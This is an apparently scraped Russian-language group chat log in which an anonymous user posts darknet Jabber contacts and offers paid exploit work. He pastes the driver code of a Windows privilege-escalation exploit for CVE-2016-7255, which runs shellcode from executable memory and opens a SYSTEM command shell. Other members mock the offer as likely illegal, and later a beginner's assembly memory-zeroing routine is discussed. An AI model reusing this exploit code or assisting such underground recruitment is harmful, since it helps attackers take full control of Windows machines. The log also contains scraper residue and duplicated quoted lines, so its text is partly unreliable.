
Berkus
02.02.2017
11:53:50
лично мне влом писать здоровенный диздок, страдаю как умею

Aidar
02.02.2017
11:55:59
Да господи ну пусть код твой дальше что?

Artem
02.02.2017
11:56:08

[Anonymous]
02.02.2017
11:56:10
если кому интересно, джаббер
null@darknet.n
PGP обязателен

Google

[Anonymous]
02.02.2017
11:56:11
я офф
null@darknet.nz

Aidar
02.02.2017
11:56:32
Инфы об эксплоите куча

[Anonymous]
02.02.2017
11:56:54
слушай
ща

Artem
02.02.2017
11:57:08
не нужно ожидать уважения от окружающих, только если надел черную шапочку

[Anonymous]
02.02.2017
11:57:08
тыж заебещь
я не блек))

Andrei
02.02.2017
11:57:56
Null
Я с тобой уже говорил по этому поводу.

Aidar
02.02.2017
11:58:05
5к руб это дичь

IDDQD
02.02.2017
11:58:07
darknull

Aidar
02.02.2017
11:58:12
Я в школе больше получал

Google


[Anonymous]
02.02.2017
11:58:13
void __cdecl main()
{
HANDLE hMutex;
BOOL bExecutedSucces = FALSE;
LARGE_INTEGER timerFrequency, timerStart, timerStop;
InitDebugConsole();
if (!(hMutex = EnterMutexLocker(SPLOIT_MUTEX)))
{
LOGMESSAGE(L_ERROR, "Error! Another exploit instance is running.\n");
goto __exit;
}
SHELL_ENTRY_PROC GetSystemPWNED = (SHELL_ENTRY_PROC)VirtualAlloc(NULL, sizeof(ShellData), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!GetSystemPWNED)
{
LOGMESSAGE(L_ERROR, "Error VirtualAlloc. Error code: %d\n", GetLastError());
goto __exit;
}
memcpy(GetSystemPWNED, ShellData, sizeof(ShellData));
LOGMESSAGE(L_INFO, "Executing CVE-2016-7255 exploit ...");
FreeConsole();
BOOL bTimerOK = (QueryPerformanceFrequency(&timerFrequency) && QueryPerformanceCounter(&timerStart));
bExecutedSucces = GetSystemPWNED(GetCurrentProcessId());
ReAttachConsole();
if(bExecutedSucces)
{
WCHAR wcSys32Path[MAX_PATH];
*wcSys32Path = 0;
GetSystemDirectoryW(wcSys32Path, MAX_PATH);
LOGMESSAGE(L_INFO, "Shell code executed.");
if (bTimerOK)
{
QueryPerformanceCounter(&timerStop);
double const tms(static_cast<double>((timerStop.QuadPart - timerStart.QuadPart) * 1000) / timerFrequency.QuadPart);
LOGMESSAGE(L_INFO, "Shellcode execution time: %5.3f ms", tms);
}
LOGMESSAGE(L_INFO, "Got system privileges! Type whoami in the second cmd window.");
ShellExecuteW(NULL, L"open", L"cmd", NULL, wcSys32Path, SW_SHOW);
}


Andrei
02.02.2017
11:58:16
Сформулируй чётко, что ты предлагаешь.
И сколько ты платишь.

[Anonymous]
02.02.2017
11:58:58
если кому интересно, джаббер
null@darknet.n
PGP обязателен
я офф
null@darknet.nz

Andrei
02.02.2017
11:59:06
А не отвечай выборочно на вопросы.

IDDQD
02.02.2017
11:59:44
e-mail заражен!!!

[Anonymous]
02.02.2017
11:59:53

Aidar
02.02.2017
12:00:55
Вы не опровергли
Последний вопрос был про валюту

[Anonymous]
02.02.2017
12:01:05
я уже говорил, от 5к
Сформулируй чётко, что ты предлагаешь.
И сколько ты платишь.

Дед Пегас
02.02.2017
12:02:21
Ваще
Оффтоп

[Anonymous]
02.02.2017
12:02:24
долларов сша..
теперь ты удовлетворен?
Вы не опровергли

Google

[Anonymous]
02.02.2017
12:02:24
Последний вопрос был про валюту

Дед Пегас
02.02.2017
12:02:30
Зобаню

[Anonymous]
02.02.2017
12:02:37
да давай
я серовно офф

IDDQD
02.02.2017
12:02:52
почему?

Дед Пегас
02.02.2017
12:02:54
Ок

Berkus
02.02.2017
12:03:26
ээ, где-то этот шеллкод я уже видел
мм, или просто похож
а, пофиг

Эдуард
02.02.2017
12:05:55
Этот вопрос прозвучал уже много раз. Причины: мы живем по большей части в РФ, здесь валюта рубли, и цены указывают в рублях, иначе сразу указывают валюту. "Кодер за 5к" - это сделать какую-то задачку за день не напрягаясь, т.е. попроектная оплата.
А вообще дичь, или пиши полный список что нужно от человека и что нужно делать, или это странный хант.
я уже говорил, от 5к
долларов сша..
теперь ты удовлетворен?

Berkus
02.02.2017
12:06:39
так он эйчар?

Эдуард
02.02.2017
12:06:49
По вакансии "требуется кодер, писать peple@earth.com" ответят скорей всего те, кому _совсем_ нечего делать.
нет, не оный)

Alex Фэils?︙
02.02.2017
14:38:01
null не нужен
Охуенно. 5К в месяц блядь за ювелирную работу
Просто прекрасно
Will code for food, блядь

Google

Stanislav
02.02.2017
14:40:34

Alex Фэils?︙
02.02.2017
14:40:42
Я блядь за просто так больше получаю? на полставки в инсте

Artem
02.02.2017
14:40:48
он про 5к баксов же, нормальные деньги. но учитывая, что это, вероятно, незаконно, то не очень нормальные деньги

Alex Фэils?︙
02.02.2017
14:41:04
Я уязвимости только в роли белой шляпы ищу?

Berkus
02.02.2017
15:01:18
звучит как отличная карьера

Artem
02.02.2017
15:02:09

Admin
ERROR: S client not available

Эдуард
02.02.2017
15:02:12

Artem
02.02.2017
15:02:20
Возможно, тебе в жизни нужны хуй и возможность

Berkus
02.02.2017
15:02:33
это возможно

Artem
02.02.2017
15:04:20
а еще немаловероятно, что это не 2 года в эквадоре, а контракт на 5 лет в штате ФСБ за 50к в месяц и еще 5 лет невыездным после этого
что-то такое ведь недавно было в новостях про чувака, которого задержали недавно

Berkus
02.02.2017
15:05:39
это если ты плохой ксакеп и не подсуетился заранее
хотя может быть null вообще сразу товарища майора представляет
директ-хайр туда

Artem
02.02.2017
15:06:18
или он сам товарищ

Alex Фэils?︙
02.02.2017
15:06:38

Google

Berkus
02.02.2017
15:07:03
но 40к долларов это же норм в месяц?

Дед Пегас
02.02.2017
15:07:28
эфиопских

Andrew
02.02.2017
15:07:31
а че нула забанили уже тут?

Alex Фэils?︙
02.02.2017
15:07:46
Он самзабанился

Berkus
02.02.2017
15:07:48
он ушел куратору отзвониться
"What good is a phone call, Mister Anderson IF YOU CANNOT SPEAK?"

Andrew
02.02.2017
15:08:40
вообще я написал ему из любопытства да и хотелось поучиться всяким эксплоитам, он скинул мне задание "RTLSecureZeroMemory" на асме сделать

Artem
02.02.2017
15:09:34
в смысле написать реализацию функции?
https://github.com/Alexpux/mingw-w64/blob/master/mingw-w64-crt/intrincs/RtlSecureZeroMemory.c ?

Andrew
02.02.2017
15:10:14
ну как я понял да, только на асме)
но я то нуб
в общем кроме "пиздец "от него не услышал ничего

Alex Фэils?︙
02.02.2017
15:10:47

Artem
02.02.2017
15:11:52

Andrew
02.02.2017
15:12:07
Он больше выпендривается, и вайпает чат своим васмом и кулхацкингом
говорюже написал из-за интереса, я уже понял что больше выпендривается
ну крч
написал я что-то такое
.data
my_lo dword 0
my_len dword 0
.code
mov edi, my_lo
mov edx, my_len
xor eax, eax
mov ecx, edx
shr ecx, 2
mov ebx, ecx
shl ebx, 2
sub edx, ebx
rep stosd
mov ecx, edx
rep stosb
ret
хочу критики
но это совсем не RTLSecureZeroMemory но вроде секьюрностью пахнет

Alex Фэils?︙
02.02.2017
15:12:37
говорюже написал из-за интереса, я уже понял что больше выпендривается
ну крч
написал я что-то такое
.data
my_lo dword 0
my_len dword 0
.code
mov edi, my_lo
mov edx, my_len
xor eax, eax
mov ecx, edx
shr ecx, 2
mov ebx, ecx
shl ebx, 2
sub edx, ebx
rep stosd
mov ecx, edx
rep stosb
ret
хочу критики
А зачем битовые сдвиги?
#topic #zerobuffer #asm #cpp

Berkus
02.02.2017
15:12:40

Artem
02.02.2017
15:12:50
volatile

Berkus
02.02.2017
15:13:29
это не секьюрность )

Дед Пегас
02.02.2017
15:14:10
Кстати, а зачем оно?